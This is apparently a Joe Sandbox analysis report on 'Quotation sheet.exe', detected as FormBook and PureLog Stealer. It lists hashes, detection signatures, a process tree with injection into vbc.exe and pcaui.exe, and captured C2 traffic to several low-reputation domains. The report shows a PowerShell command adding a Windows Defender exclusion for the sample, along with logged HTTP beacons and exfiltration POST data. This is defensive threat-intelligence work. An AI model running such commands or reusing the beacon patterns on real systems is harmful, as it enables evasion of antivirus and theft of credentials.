Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation sheet.exe

Overview

General Information

Sample name:Quotation sheet.exe
Analysis ID:1562984
MD5:44ae4c9c2ab6623c0c1d04bb8b81871e
SHA1:efdd834862890028d1b52e2076ff5f78c84754c5
SHA256:122baa2b0520a7dd37025a89bccf9fcaf87f99519bfc0ec84a4a48cddb6f9b6d
Tags:exeuser-lowmal3
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Quotation sheet.exe (PID: 5448 cmdline: "C:\Users\user\Desktop\Quotation sheet.exe" MD5: 44AE4C9C2AB6623C0C1D04BB8B81871E)
    • powershell.exe (PID: 5996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 3784 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
    • vbc.exe (PID: 4620 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
      • UsMxwwTDRUHSSD.exe (PID: 3976 cmdline: "C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • pcaui.exe (PID: 356 cmdline: "C:\Windows\SysWOW64\pcaui.exe" MD5: A8F63C86DEF45A7E48E7F7DF158CFAA9)
          • UsMxwwTDRUHSSD.exe (PID: 2444 cmdline: "C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5876 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2354177736.0000000005C50000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.2440846856.0000000005250000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.3973205147.0000000004EC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              0.2.Quotation sheet.exe.5c50000.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.Quotation sheet.exe.5c50000.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  7.2.vbc.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                    0.2.Quotation sheet.exe.4379970.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation sheet.exe", ParentImage: C:\Users\user\Desktop\Quotation sheet.exe, ParentProcessId: 5448, ParentProcessName: Quotation sheet.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe", ProcessId: 5996, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation sheet.exe", ParentImage: C:\Users\user\Desktop\Quotation sheet.exe, ParentProcessId: 5448, ParentProcessName: Quotation sheet.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe", ProcessId: 5996, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation sheet.exe", ParentImage: C:\Users\user\Desktop\Quotation sheet.exe, ParentProcessId: 5448, ParentProcessName: Quotation sheet.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe", ProcessId: 5996, ProcessName: powershell.exe

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://www.acond-22-mvr.click/w9z4/Avira URL Cloud: Label: malware
                      Source: http://www.acond-22-mvr.click/w9z4/?pXIDi=30N834GpBZU0OT&4nJt=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfeeeHGBayQssFEBpobh2/IGMpij3nRh8aV/8PsprR6rwOHUxE7sI=Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for submitted file
                      Source: Quotation sheet.exeReversingLabs: Detection: 42%
                      Yara detected FormBook
                      Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2440846856.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3973205147.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3973090704.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3973266974.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3973027179.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2448995977.0000000006B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: Quotation sheet.exeJoe Sandbox ML: detected
                      Source: Quotation sheet.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Quotation sheet.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: pcaui.exe, 00000009.00000002.3972944908.0000000004C39000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.000000000575C000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.0000000002B9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2755311109.000000000C8FC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: pcaui.pdb source: vbc.exe, 00000007.00000002.2440631614.0000000005058000.00000004.00000020.00020000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000002.3972118198.000000000133B000.00000004.00000020.00020000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000003.2379322362.000000000131B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: BCYJ.pdb source: Quotation sheet.exe
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UsMxwwTDRUHSSD.exe, 00000008.00000000.2362478081.000000000091E000.00000002.00000001.01000000.0000000C.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3971822631.000000000091E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000003.2456107078.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000003.2453790948.0000000004C38000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: BCYJ.pdbSHA256 source: Quotation sheet.exe
                      Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, pcaui.exe, 00000009.00000003.2456107078.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000003.2453790948.0000000004C38000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: vbc.pdb source: pcaui.exe, 00000009.00000002.3972944908.0000000004C39000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.000000000575C000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.0000000002B9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2755311109.000000000C8FC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: pcaui.pdbGCTL source: vbc.exe, 00000007.00000002.2440631614.0000000005058000.00000004.00000020.00020000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000002.3972118198.000000000133B000.00000004.00000020.00020000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000003.2379322362.000000000131B000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D7C920 FindFirstFileW,FindNextFileW,FindClose,9_2_02D7C920
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4x nop then xor eax, eax9_2_02D69E10
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4x nop then mov ebx, 00000004h9_2_053904E8

                      Networking

                      barindex
                      Performs DNS queries to domains with low reputation
                      Source: DNS query: www.rtpterbaruwaktu3.xyz
                      Source: Joe Sandbox ViewIP Address: 47.76.213.197 47.76.213.197
                      Source: Joe Sandbox ViewASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /7yx4/?4nJt=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQfxXg8RiZPfSfo9OGQETOHlofaWbM+4fubyGFlkwZbqaQYg0Zq5k=&pXIDi=30N834GpBZU0OT HTTP/1.1Host: www.rtpterbaruwaktu3.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /klhq/?4nJt=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+neDAiWkCkYZ57L047aTN0FvloZtiL1GHORQkvVBkncoqs6arxlw=&pXIDi=30N834GpBZU0OT HTTP/1.1Host: www.70kdd.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /w9z4/?pXIDi=30N834GpBZU0OT&4nJt=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfeeeHGBayQssFEBpobh2/IGMpij3nRh8aV/8PsprR6rwOHUxE7sI= HTTP/1.1Host: www.acond-22-mvr.clickAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /11t3/?4nJt=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL01304IHNwj2Yod4wHZbXR5gNDbNQ3/FaK5QMq4IALVNsxgTOJYQtE8=&pXIDi=30N834GpBZU0OT HTTP/1.1Host: www.smartcongress.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /2pji/?4nJt=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT4yZs3PgO7inQ/GZvdPSYtqhraoLnL30EVGtCNPTPRdM0+5LARJM=&pXIDi=30N834GpBZU0OT HTTP/1.1Host: www.mrpokrovskii.proAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /egqi/?4nJt=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8hsZr969MltuXdWdWoGPR3ZZyiGe82JgugZANkAzsKk95fWmtipo=&pXIDi=30N834GpBZU0OT HTTP/1.1Host: www.ytsd88.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /hyyd/?pXIDi=30N834GpBZU0OT&4nJt=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qXzRX0Cz+jRSrIUTHSjZKbFGxkH1PP6E18JoqtQ6kBAoCTLA5p2fs= HTTP/1.1Host: www.matteicapital.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /rsvy/?4nJt=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rUtvmrzoHlx2y6yO58LrdYrj1cF4c73Y/2t0betNNlPaD+UeVatM=&pXIDi=30N834GpBZU0OT HTTP/1.1Host: www.llljjjiii.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /huvt/?pXIDi=30N834GpBZU0OT&4nJt=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPYmXYZehu45VPp8MOy5WAu5nHK8ZcCMaFZ8i121M6teoDlc6/N3I= HTTP/1.1Host: www.ampsamkok88.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficDNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.70kdd.top
                      Source: global trafficDNS traffic detected: DNS query: www.acond-22-mvr.click
                      Source: global trafficDNS traffic detected: DNS query: www.smartcongress.net
                      Source: global trafficDNS traffic detected: DNS query: www.mrpokrovskii.pro
                      Source: global trafficDNS traffic detected: DNS query: www.ytsd88.top
                      Source: global trafficDNS traffic detected: DNS query: www.matteicapital.online
                      Source: global trafficDNS traffic detected: DNS query: www.llljjjiii.shop
                      Source: global trafficDNS traffic detected: DNS query: www.ampsamkok88.shop
                      Source: unknownHTTP traffic detected: POST /klhq/ HTTP/1.1Host: www.70kdd.topAccept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.70kdd.topCache-Control: max-age=0Content-Length: 209Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.70kdd.top/klhq/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)Data Raw: 34 6e 4a 74 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 57 5a 30 4c 72 69 44 39 76 66 6c 76 45 4d 36 6b 31 4e 44 55 63 30 6a 53 51 43 51 31 66 64 55 56 64 6d 76 4d 30 70 39 46 2f 34 34 75 45 44 33 77 61 6c 65 30 7a 54 72 39 6d 7a 2f 6d 68 41 57 70 63 73 31 75 47 50 52 6d 69 64 33 51 6b 58 78 68 6c 70 34 68 30 34 77 55 39 4b 58 4b 30 42 61 65 32 39 73 53 41 51 62 44 44 57 41 68 38 31 68 66 39 65 68 56 39 6f 36 73 38 46 42 41 62 73 5a 69 7a 51 30 4b 68 64 42 38 31 6e 74 65 46 6d 72 39 42 63 77 32 63 37 45 42 77 61 50 5a 62 37 4d 30 67 62 47 6f 6e 64 69 32 71 67 4a 38 64 41 48 68 77 30 66 67 49 30 50 59 2f 49 66 46 76 5a 4e 55 Data Ascii: 4nJt=NFwfoXbecwawWZ0LriD9vflvEM6k1NDUc0jSQCQ1fdUVdmvM0p9F/44uED3wale0zTr9mz/mhAWpcs1uGPRmid3QkXxhlp4h04wU9KXK0Bae29sSAQbDDWAh81hf9ehV9o6s8FBAbsZizQ0KhdB81nteFmr9Bcw2c7EBwaPZb7M0gbGondi2qgJ8dAHhw0fgI0PY/IfFvZNU
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 26 Nov 2024 10:17:20 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 26 Nov 2024 10:17:38 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66e01838-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
